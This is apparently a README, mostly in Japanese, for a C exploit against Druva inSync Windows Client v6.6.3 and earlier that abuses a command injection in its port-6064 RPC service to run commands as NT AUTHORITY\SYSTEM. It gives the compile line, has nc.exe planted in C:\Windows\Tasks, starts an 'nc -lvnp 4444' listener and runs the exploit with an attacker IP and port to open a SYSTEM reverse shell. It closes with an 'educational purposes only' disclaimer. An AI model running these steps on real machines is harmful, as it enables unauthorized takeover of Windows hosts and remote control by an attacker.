
Druva向けローカル特権昇格
**Druva inSync Windows Client(v6.6.3以下)**用のC言語ベースのエクスプロイトです。このアプリケーションはポート6064でRPCサービスを公開しており、パストラバーサルによるコマンドインジェクションに対して脆弱です。これにより、ローカルユーザーがNT AUTHORITY\SYSTEMとして任意のコマンドを実行できるようになります。
ソースコードをコンパイルするには、gcc(MinGW)を使用します:
gcc exploit.c -o exploit.exe -lws2_32
SYSTEMアカウントがアクセス可能なディレクトリ(例:C:\Windows\Tasks\)にnc.exeのコピーを配置します。
攻撃側マシンでリスナーを起動します:
nc -lvnp 4444
Run the exploit on the target Windows machine:
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
例:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
このツールは教育目的のみで使用されます。許可なくテストするシステムでの不正使用は違法です。